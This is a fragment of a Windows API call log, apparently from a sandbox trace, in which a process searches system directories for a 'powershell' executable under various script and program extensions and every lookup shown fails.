	[0623.776] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0623.784] SetErrorMode (uMode=0x1) returned 0x1
	[0623.785] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0623.785] SetErrorMode (uMode=0x1) returned 0x1
	[0623.786] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0623.797] SetErrorMode (uMode=0x1) returned 0x1
	[0623.798] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0623.798] SetErrorMode (uMode=0x1) returned 0x1
	[0623.798] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0623.807] SetErrorMode (uMode=0x1) returned 0x1
	[0623.808] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0623.808] SetErrorMode (uMode=0x1) returned 0x1
	[0623.808] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0624.891] SetErrorMode (uMode=0x1) returned 0x1
	[0624.892] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0624.893] SetErrorMode (uMode=0x1) returned 0x1
	[0624.893] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0624.901] SetErrorMode (uMode=0x1) returned 0x1
	[0624.902] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0624.902] SetErrorMode (uMode=0x1) returned 0x1
	[0624.902] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0624.918] SetErrorMode (uMode=0x1) returned 0x1
	[0624.919] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0624.919] SetErrorMode (uMode=0x1) returned 0x1
	[0624.919] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0624.930] SetErrorMode (uMode=0x1) returned 0x1
	[0624.931] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0624.932] SetErrorMode (uMode=0x1) returned 0x1
	[0624.932] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.822] SetErrorMode (uMode=0x1) returned 0x1
	[0625.824] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0625.824] SetErrorMode (uMode=0x1) returned 0x1
	[0625.824] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.832] SetErrorMode (uMode=0x1) returned 0x1
	[0625.834] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0625.834] SetErrorMode (uMode=0x1) returned 0x1
	[0625.834] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.845] SetErrorMode (uMode=0x1) returned 0x1
	[0625.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.847] SetErrorMode (uMode=0x1) returned 0x1
	[0625.847] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.848] SetErrorMode (uMode=0x1) returned 0x1
	[0625.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.848] SetErrorMode (uMode=0x1) returned 0x1
	[0625.848] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.848] SetErrorMode (uMode=0x1) returned 0x1
	[0625.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.849] SetErrorMode (uMode=0x1) returned 0x1
	[0625.849] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.849] SetErrorMode (uMode=0x1) returned 0x1
	[0625.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.850] SetErrorMode (uMode=0x1) returned 0x1
	[0625.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.850] SetErrorMode (uMode=0x1) returned 0x1
	[0625.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.850] SetErrorMode (uMode=0x1) returned 0x1
	[0625.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.851] SetErrorMode (uMode=0x1) returned 0x1
	[0625.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.851] SetErrorMode (uMode=0x1) returned 0x1
	[0625.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.851] SetErrorMode (uMode=0x1) returned 0x1
	[0625.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.852] SetErrorMode (uMode=0x1) returned 0x1
	[0625.852] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.852] SetErrorMode (uMode=0x1) returned 0x1
	[0625.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.852] SetErrorMode (uMode=0x1) returned 0x1
	[0625.853] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.853] SetErrorMode (uMode=0x1) returned 0x1
	[0625.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.853] SetErrorMode (uMode=0x1) returned 0x1
	[0625.853] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.853] SetErrorMode (uMode=0x1) returned 0x1
	[0625.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.854] SetErrorMode (uMode=0x1) returned 0x1
	[0625.854] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.854] SetErrorMode (uMode=0x1) returned 0x1
	[0625.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.857] SetErrorMode (uMode=0x1) returned 0x1
	[0625.858] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.858] SetErrorMode (uMode=0x1) returned 0x1
	[0625.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.858] SetErrorMode (uMode=0x1) returned 0x1
	[0625.858] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0625.859] SetErrorMode (uMode=0x1) returned 0x1
	[0625.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0625.859] SetErrorMode (uMode=0x1) returned 0x1
	[0625.859] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.546] SetErrorMode (uMode=0x1) returned 0x1
	[0626.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0626.546] SetErrorMode (uMode=0x1) returned 0x1
	[0626.547] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.547] SetErrorMode (uMode=0x1) returned 0x1
	[0626.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0626.547] SetErrorMode (uMode=0x1) returned 0x1
	[0626.547] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.548] SetErrorMode (uMode=0x1) returned 0x1
	[0626.548] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.548] SetErrorMode (uMode=0x1) returned 0x1
	[0626.548] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.548] SetErrorMode (uMode=0x1) returned 0x1
	[0626.548] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.549] SetErrorMode (uMode=0x1) returned 0x1
	[0626.549] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.549] SetErrorMode (uMode=0x1) returned 0x1
	[0626.549] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.549] SetErrorMode (uMode=0x1) returned 0x1
	[0626.549] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.550] SetErrorMode (uMode=0x1) returned 0x1
	[0626.550] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.550] SetErrorMode (uMode=0x1) returned 0x1
	[0626.550] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.550] SetErrorMode (uMode=0x1) returned 0x1
	[0626.550] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.550] SetErrorMode (uMode=0x1) returned 0x1
